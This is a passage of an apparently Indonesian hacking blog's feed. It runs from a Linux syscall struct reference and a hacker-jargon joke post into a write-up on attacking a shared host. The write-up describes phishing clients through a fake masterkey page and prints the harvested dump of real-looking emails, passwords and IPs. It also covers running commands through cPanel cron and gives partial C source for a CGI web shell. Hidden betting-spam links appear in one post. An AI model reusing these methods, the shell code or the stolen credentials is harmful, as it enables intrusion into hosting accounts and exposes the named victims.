ru_msgsnd; /* messages sent */<br /> long ru_msgrcv; /* messages received */<br /> long ru_nsignals; /* signals received */<br /> long ru_nvcsw; /* voluntary context switches */<br /> long ru_nivcsw; /* involuntary '' */<br />}; </td> </tr><tr><th valign="top"><a href="" name="sched_param">sched_param</a></th> <td> <a href="">include/linux/sched.h</a>:<br />struct sched_param {<br /> int sched_priority;<br />}; </td> </tr><tr><th valign="top"><a href="" name="sel_arg_struct">sel_arg_struct</a></th> <td> <a href="">arch/i386/kernel/sys_i386.c</a>:<br />struct sel_arg_struct {<br /> unsigned long n;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#fd_set">fd_set</a> *inp, *outp, *exp;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> *tvp;<br />}; </td> </tr><tr><th valign="top"><a href="" name="sigaction">sigaction</a></th> <td> <a href="">include/asm/signal.h</a>:<br />struct sigaction {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__sighandler_t">__sighandler_t</a> sa_handler;<br /> unsigned long sa_flags;<br /> void (*sa_restorer)(void);<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">sigset_t</a> sa_mask; /* mask last for extensibility */<br />}; </td> </tr><tr><th valign="top"><a href="" name="stat">stat</a></th> <td> <a href="">include/asm/stat.h</a>:<br />struct stat {<br /> unsigned short st_dev;<br /> unsigned short __pad1;<br /> unsigned long st_ino;<br /> unsigned short st_mode;<br /> unsigned short st_nlink;<br /> unsigned short st_uid;<br /> unsigned short st_gid;<br /> unsigned short st_rdev;<br /> unsigned short __pad2;<br /> unsigned long st_size;<br /> unsigned long st_blksize;<br /> unsigned long st_blocks;<br /> unsigned long st_atime;<br /> unsigned long __unused1;<br /> unsigned long st_mtime;<br /> unsigned long __unused2;<br /> unsigned long st_ctime;<br /> unsigned long __unused3;<br /> unsigned long __unused4;<br /> unsigned long __unused5;<br /></td> </tr><tr><th valign="top"><a href="" name="statfs">statfs</a></th> <td> <a href="">include/asm/statfs.h</a>:<br />struct statfs {<br /> long f_type;<br /> long f_bsize;<br /> long f_blocks;<br /> long f_bfree;<br /> long f_bavail;<br /> long f_files;<br /> long f_ffree;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__kernel_fsid_t">__kernel_fsid_t</a> f_fsid;<br /> long f_namelen;<br /> long f_spare[6];<br />}; </td> </tr><tr><th valign="top"><a href="" name="__sysctl_args">__sysctl_args</a></th> <td> include/linux/sysctl.h<br />struct __sysctl_args {<br /> int *name;<br /> int nlen;<br /> void *oldval;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a> *oldlenp;<br /> void *newval;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a> newlen;<br /> unsigned long __unused[4];<br />}; </td> </tr><tr><th valign="top"><a href="" name="sysinfo">sysinfo</a></th> <td> <a href="">include/linux/kernel.h</a>:<br />struct sysinfo {<br /> long uptime; /* Seconds since boot */<br /> unsigned long loads[3]; /* 1, 5, and 15 minute load averages */<br /> unsigned long totalram; /* Total usable main memory size */<br /> unsigned long freeram; /* Available memory size */<br /> unsigned long sharedram; /* Amount of shared memory */<br /> unsigned long bufferram; /* Memory used by buffers */<br /> unsigned long totalswap; /* Total swap space size */<br /> unsigned long freeswap; /* swap space still available */<br /> unsigned short procs; /* Number of current processes */<br /> char _f[22]; /* Pads structure to 64 bytes */<br />}; </td> </tr><tr><th valign="top"><a href="" name="timex">timex</a></th> <td> <a href="">include/linux/timex.h</a>:<br />struct timex {<br /> unsigned int modes; /* mode selector */<br /> long offset; /* time offset (usec) */<br /> long freq; /* frequency offset (scaled ppm) */<br /> long maxerror; /* maximum error (usec) */<br /> long esterror; /* estimated error (usec) */<br /> int status; /* clock command/status */<br /> long constant; /* pll time constant */<br /> long precision; /* clock precision (usec) (read only) */<br /> long tolerance; /* clock frequency tolerance (ppm)<br /> * (read only)<br /> */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> time; /* (read only) */<br /> long tick; /* (modified) usecs between clock ticks */<br /> long ppsfreq; /* pps frequency (scaled ppm) (ro) */<br /> long jitter; /* pps jitter (us) (ro) */<br /> int shift; /* interval duration (s) (shift) (ro) */<br /> long stabil; /* pps stability (scaled ppm) (ro) */<br /> long jitcnt; /* jitter limit exceeded (ro) */<br /> long calcnt; /* calibration intervals (ro) */<br /> long errcnt; /* calibration errors (ro) */<br /> long stbcnt; /* stability limit exceeded (ro) */<br /><br /> int :32; int :32; int :32; int :32;<br /> int :32; int :32; int :32; int :32;<br /> int :32; int :32; int :32; int :32;<br />}; </td> </tr><tr><th valign="top"><a href="" name="timespec">timespec</a></th> <td> <a href="">include/linux/time.h</a>:<br />struct timespec {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#time_t">time_t</a> tv_sec; /* seconds */<br /> long tv_nsec; /* nanoseconds */<br />}; </td> </tr><tr><th valign="top"><a href="" name="timeval">timeval</a></th> <td> <a href="">include/linux/time.h</a>:<br />struct timeval {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#time_t">time_t</a> tv_sec; /* seconds */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#suseconds_t">suseconds_t</a> tv_usec; /* microseconds */<br />}; </td> </tr><tr><th valign="top"><a href="" name="timezone">timezone</a></th> <td> <a href="">include/linux/time.h</a>:<br />struct timezone {<br /> int tz_minuteswest; /* minutes west of Greenwich */<br /> int tz_dsttime; /* type of dst correction */<br />}; </td> </tr><tr><th valign="top"><a href="" name="tms">tms</a></th> <td> include/linux/times.h<br />struct tms {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> tms_utime;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> tms_stime;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> tms_cutime;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> tms_cstime;<br />}; </td> </tr><tr><th valign="top"><a href="" name="ustat">ustat</a></th> <td> <a href="">include/linux/types.h</a>:<br />struct ustat {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__kernel_daddr_t">__kernel_daddr_t</a> f_tfree;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__kernel_ino_t">__kernel_ino_t</a> f_tinode;<br /> char f_fname[6];<br /> char f_fpack[6];<br />}; </td> </tr><tr><th valign="top"><a href="" name="utimbuf">utimbuf</a></th> <td> <a href="">include/linux/utime.h</a>:<br />struct utimbuf {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#time_t">time_t</a> actime;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#time_t">time_t</a> modtime;<br />}; </td> </tr><tr><th valign="top"><a href="" name="vm86plus_info_struct">vm86plus_info_struct</a></th> <td> <a href="">include/asm/vm86.h</a>:<br />struct vm86plus_info_struct {<br /> unsigned long force_return_for_pic:1;<br /> unsigned long vm86dbg_active:1;<br /> unsigned long vm86dbg_TFpendig:1;<br /> unsigned long unused:28;<br /> unsigned long is_vm86pus:1;<br /> unsigned char vm86dbg_intxxtab[32];<br />}; </td> </tr><tr><th valign="top"><a href="" name="vm86plus_struct">vm86plus_struct</a></th> <td> <a href="">include/asm/vm86.h</a>:<br />struct vm86plus_struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#vm86_regs">struct vm86_regs</a> regs;<br /> unsigned long flags;<br /> unsigned long screen_bitmap;<br /> unsigned long cpu_type;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#revectored_struct">struct revectored_struct</a> int_revectored;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#revectored_struct">struct revectored_struct</a> int21_revectored;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#vm86plus_info_struct">struct vm86plus_info_struct</a> vm86plus;<br />}; </td> </tr><tr><th valign="top"><a href="" name="vm86_regs">vm86_regs</a></th> <td> <a href="">include/asm/vm86.h</a>:<br />struct vm86_regs {<br />/* normal regs, with special meaning for the segment descriptors.. */<br /> long ebx;<br /> long ecx;<br /> long edx;<br /> long esi;<br /> long edi;<br /> long ebp;<br /> long eax;<br /> long __null_ds;<br /> long __null_es;<br /> long __null_fs;<br /> long __null_gs;<br /> long orig_eax;<br /> long eip;<br /> unsigned short cs, __csh;<br /> long eflags;<br /> long esp;<br /> unsigned short ss, __ssh;<br />/* these are specific to v86 mode: */<br /> unsigned short es, __esh;<br /> unsigned short ds, __dsh;<br /> unsigned short fs, __fsh;<br /> unsigned short gs, __gsh;<br />}; </td> </tr><tr><th valign="top"><a href="" name="vm86_struct">vm86_struct</a></th> <td> <a href="">include/asm/vm86.h</a>:<br />struct vm86_struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#vm86_regs">struct vm86_regs</a> regs;<br /> unsigned long flags;<br /> unsigned long screen_bitmap;<br /> unsigned long cpu_type;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#revectored_struct">struct revectored_struct</a> int_revectored;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#revectored_struct">struct revectored_struct</a> int21_revectored;<br />}; </td> </tr></tbody> </table><hr size="4" /> <h4>©2004, Gary L. Burt</h4><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-9186379488701438957?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-56966799585739082982012-02-20T15:57:00.000-08:002012-02-20T15:57:01.791-08:00Surat Cinta Ev1lut10n-Seandainya hatimu adalah sebuah sistem, maka aku akan scan kamu untuk mengetahui port mana yang terbuka.<br /><br />-Seandainya hatimu adalah sebuah sistem maka akan kulakukan traceroute untuk mengetahui berapa router (hop) menuju hatimu yang bisa dengan mudah kuguncang untuk membuat gejolak trafik di dalam hatimu.<br /><br />-Seandainya hatimu adalah sebuah sistem maka kumohon matikanlah ipsecmu agar aku bisa lebih leluasa melakukan penetrasi ke hatimu<br /><br />-Aku berharap dirimu adalah BSD yang dengan iklas menerima payload remote exploitku di hatimu agar hatimu terbuka untukku dan memberikan spawn shell harapan padaku agar tanpa ragu kulakukan $nc hatimu pada port yang terbuka.<br /><br />-Seandainya hatimu adalah sebuah sistem yang bisa kumasuki maka ijinkanlah aku untuk memiliki hatimu seutuhnya dengan mengeksekusi exploit2 ku untuk mengaet root di hatimu tanpa perlu menyanyikan lagu bon jovi.<br /><br />-Seandainya hatimu adalah sebuah sistem yang telah kukuasai ijinkanlah aku menanamkan userspace dan kernelspace rootkit agar keberadaanku di hatimu abadi<br /><br />- Janganlah melupakanku seperti wanita2 lain yang telah melupakanku<br /><br />-Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan sistemku!<br /><br />-Suatu saat nanti aku akan datang dan mengatakan kalau di MBR ku telah terinfeksi virus yang menghanyutkan. Ga ada anti virus yang dapat menangkalnya selain ...<br />kamu.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5696679958573908298?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-16827175611233027982012-02-20T08:22:00.000-08:002012-02-20T08:27:13.252-08:00kids game<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-55Qua4iMAaE/T0Jy7JO8WZI/AAAAAAAAA5w/0MgInObsRIc/s1600/botnet1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-55Qua4iMAaE/T0Jy7JO8WZI/AAAAAAAAA5w/0MgInObsRIc/s1600/botnet1.jpg" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Qq9S-Vh7gLk/T0JzEPQZhnI/AAAAAAAAA54/9DijB5ycmfo/s1600/botnet2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Qq9S-Vh7gLk/T0JzEPQZhnI/AAAAAAAAA54/9DijB5ycmfo/s1600/botnet2.jpg" /></a></div><br /><style>#agenbolaeuro2012{color:black}</style><br /><div style="background-color:black"><a href="http://elsiesstudio.com/images//agenbola.html" title="agen bola sbobet" name="prediksi euro 2012" id="agenbolaeuro2012">prediksi euro 2012</a><br /><a href="http://www.managemycomplaints.com/Images/agenbola.html" title="agen bola" name="jadwal euro 2012" id="agenbolaeuro2012">jadwal euro 2012</a><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-1682717561123302798?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-44274764773686966002012-02-19T10:25:00.004-08:002012-02-20T06:18:10.159-08:00- Server Freezing (Bukan DDOS !!! (echo.or.id case study)) - by: ev1lut10n- Server Freezing (Bukan DDOS !!! (echo.or.id case study)) - by: ev1lut10n<br /><br />"yes u're elite but u don't wanna read : langkah 5. tanpa memerkukan akses root, attacker akan menyiapkan privat exploit local untuk melumpuhkan target. if they think this is an old sploit then they're under a big mistake, underestimate others that's your weakness, as long as<br />you have this weakness you can not defeat the evil"<br /><br />"inti dari serangan ini bukanlah DDOS tapi penggunaan exploit local dan bagaimana ide untuk mendapatkan sebanyak mungkin<br />pintu agar bisa mengontrol server selama mungkin dengan local exploit"<br /><br />Selama ini attacker mengira cara untuk membunuh suatu target hanya dari luar (layer 1 s/d 7), tapi pernahkah Anda<br />membayangkan anda berada dalam suatu hosting massal di mana setiap klien lain menjadi attacker bagi Anda?<br /><br />ini adalah teknik yang dipakai attacker untuk menyerang echo beberapa waktu lalu.<br /><br />beberapa waktu lalu echo yang menggunakan shared hosting masterweb di mana banyak klien lain yang dihosting di situ.<br />yang dipikirkan attacker adalah bagaimana cara melumpuhkan target tanpa melakukan ddos? <br />attacker akan berusaha mendapatkan sebanyak mungkin akun hosting lain yang 1 hosting dg target.<br /><br />cara paling efektif adalah mengumpulkan sebanyak mungkin akun2 masterkey dari tiap klien yang hosting di server yang sama.<br />caranya simple . <br /><br />langkah 1. kita melakukan reverse ip seperti biasa untuk mendapatkan list domain yang dihosting di server yang sama.<br />langkah 2. attacker akan melakukan whois utk melihat email dari masing 2 pemilik domain<br />langkah 3. attacker mengirimkan pemberitahuan berupa spam email (phising) ke ratusan email klien yang telah berhasil dikumpulkan tadi<br />untuk login ke fake page masterkey :<br /><br /> http://sevixniaga.com.31.masterweb.net/masterkey/<br /><br />karena dikirimkan ke ratusan klien masterweb yang dihost yang sama tentu saja attacker tinggal memanen hasilnya dalam 1-2 harian:<br /><br />http://sevixniaga.com.31.masterweb.net/masterkey/data.txt<br />===================<br />tes@tes.com|tes|139.195.59.81|Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10<br />tes@tes.com|tes|139.195.59.81|Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10<br />tes@tes.com|rrr|139.195.59.81|Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10<br />ramli.lau@gmail.com|30122103|125.160.198.190|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22<br />ramli.lau@gmail.com|30122103|125.160.198.190|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22<br />ramli.lau@gmail.com|30122103|125.160.198.190|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2<br />ramli.lau@gmail.com|312213|125.160.198.190|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2<br />b_suzanto@yahoo.com|Abelherlina|206.53.148.146|BlackBerry8900/5.0.0.1067 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/102<br />anombramanjati@yahoo.com|Muda1974|125.160.98.25|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2<br />ramli.lau@gmail.com|30122103|139.195.55.210|Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10<br />ibnuyoga@gmail.com|gapake88|180.243.185.118|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2<br />endiarchie@yahoo.com|o8ZYCXGYq7 |124.81.82.146|Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24<br />endiarchie@yahoo.com|o8ZYCXGYq7 |124.81.82.146|Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24<br />sutantog@yahoo.co.uk|nanalitA|117.102.116.130|Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4<br />sutantog@yahoo.co.uk|nanalitA|117.102.116.130|Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4<br />sutantog@yahoo.co.uk|nanalita|117.102.116.130|Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|mwn102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />agatha.purbadita@gmail.com|thata102030|180.246.228.19|Opera/9.80 (Windows NT 5.1; U; Edition Indonesian Local; en) Presto/2.9.168 Version/11.50<br />thedayzeo@yahoo.com|tweety|118.97.78.34|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)<br />thedayzeo@yahoo.com|tweety|118.97.78.34|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)<br />agatha.purbadita@gmail.com|mwn102030|180.247.12.182|Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0<br />agatha.purbadita@gmail.com|thata102030|180.247.12.182|Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0<br />yonohdwik@gmail.com|sonicgear|139.195.15.75|Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0<br />thedayzeo@yahoo.com|tweety|118.97.78.34|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)<br />===================================<br /><br />langkah 4. setelah mendapatkan begitu banyaknya akun hosting , attacker tinggal masuk ke masterkey masing2 klien hosting<br /> seperti kita ketahui bersama di dalam masterkey kita bisa mengakses akun hostingan untuk kemudia mengupload privat exploit.<br /><br /><br />langkah 5. tanpa memerkukan akses root, attacker akan menyiapkan privat exploit local <br />untuk melumpuhkan target. untuk menunjang niat social engineering (menggerakkan pihak hosting untuk melakukan hal yang diinginkan attacker)<br />attacker dengan sengaja memberikan filename: echo.or.id utk elf lsb executable exploit yang dia siapkan untuk melumpuhkan targetnya yang jika dirun:<br />====<br />./echo.or.id<br />====<br /><br />hanya dalam sepersekian detik setelah exploit yang disiapkan attacker dirun akan mengacaukan kernel scheduler di server target.<br /><br />langkah 6. attacker melakukan serangan di layer 7 dengan tujuan agar pihak hosting tidak menyangka kalau sebenarnya tiap2 klien di server mereka sudah<br />dibackdoor oleh attacker.<br /><br /><br />lalu bagaimana caranya mengeksekusi local exploit pada kondisi server dengan kondisi disable php system command dan cgi??<br /><br /><br />check this out:<br /><br /><br />yup kali ini akan kita mainkan salah satu dari permainan rahasia yang paling mudah (teknik ini hanya utk pemula yg baru belajar membypass)<br />yang biasa dipakai attacker dalam membypass (masih banyak teknik2 lainya yg bisa dipakai si attacker untuk membypass).<br /><br />misal pada target terdapat disable function php berikut ini:<br />disable_functions: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec,posix_getpwuid,posix_getpwnam<br /><br />lalu kita mencoba mengupload shell cgi perl maupun python ke cgi-bin tapi sayangnya setelah diupload crut:<br />===<br />Internal Server Error<br /><br />The server encountered an internal error or misconfiguration and was unable to complete your request.<br /><br />Please contact the server administrator, webmaster@adhdsociety.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.<br /><br />More information about this error may be available in the server error log.<br /><br />Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.<br />=====<br /><br />karena masalah path atau krn perl atau python pantang kita exec (permission denied bo)<br /><br />untuk mengatasi permasalahan di atas bisa dg mencolong satu cpanel di server itu lalu setelah masuk ke cpanel<br />liat di bag biasanya ada cron, dari situ kita bisa pakai untuk menjalankan perintah shell:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2-4aWA5wnmA/TzxBXFFxyYI/AAAAAAAAA5I/jMGrjsMGCBw/s1600/kue.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2-4aWA5wnmA/TzxBXFFxyYI/AAAAAAAAA5I/jMGrjsMGCBw/s1600/kue.jpg" /></a></div><br /><br />selanjutnya bikin cron baru, pilih common setting, pilih every minute:<br /><br />misal perintahnya: id > id.txt<br /><br />selanjutnya jika berhasil maka kita bisa melihat hasil jalanya perintah di file id.txt tadi yang akan tersimpan di /home/usercpanelyangkitaboboltadi<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-87QUIrOy9k8/TzxBv8kt3DI/AAAAAAAAA5Q/JH0Xdv8Y5-Q/s1600/kue2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://2.bp.blogspot.com/-87QUIrOy9k8/TzxBv8kt3DI/AAAAAAAAA5Q/JH0Xdv8Y5-Q/s320/kue2.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div><br /><br />misal kita liat hasil pocnya seperti di bawah ini:<br /><br /><a href="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" /></a><br /><br />nah karena teknik di atas akan berjalan sangat lama krn harus menunggu cron permenit kita akan gali lagi lebih dalam.<br />banyak teknik yang bisa dipakai. misal dg cgi shell dari c :<br /><br />=====<br />/**<br />CGI Shell in C<br />made by : ev1lut10n<br />**/<br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br /><br />static void kotak_cmd()<br />{<br />printf("%s","<br><form action=?");<br />printf("%s","method=get>"); <br />printf("%s","shell command : <input type=text"); <br />printf("%s"," name=cmd>"); <br />printf("%s","<input type=submit"); <br />printf("%s"," value=execute>");<br />printf("%s","</form>");<br />}<br />static void set_heder()<br />{<br /> printf("%s%c%c\n","Content-Type:text/html;charset=iso-8859-1",13,10);<br />}<br /><br /><br />char *replace(char *st, char *orig, char *repl) {<br /> static char buffer[4096];<br /> char *ch;<br /> if (!(ch = strstr(st, orig)))<br /> return st;<br /> strncpy(buffer, st, ch-st); <br /> buffer[ch-st] = 0;<br /> sprintf(buffer+(ch-st), "%s%s", repl, ch+strlen(orig));<br /> return buffer;<br /> }<br /> <br />int main(void)<br />{<br />char *data;<br />char cmd[100];<br />char perintah[256]=""; <br />set_heder();<br />kotak_cmd(); <br />data = getenv("QUERY_STRING");<br />sscanf(data,"cmd=%s",cmd);<br />printf("\ncmd: |%s|\n",cmd); <br />strcat(perintah,cmd);<br /> printf("\nperintah: |%s|\n",perintah); <br /> 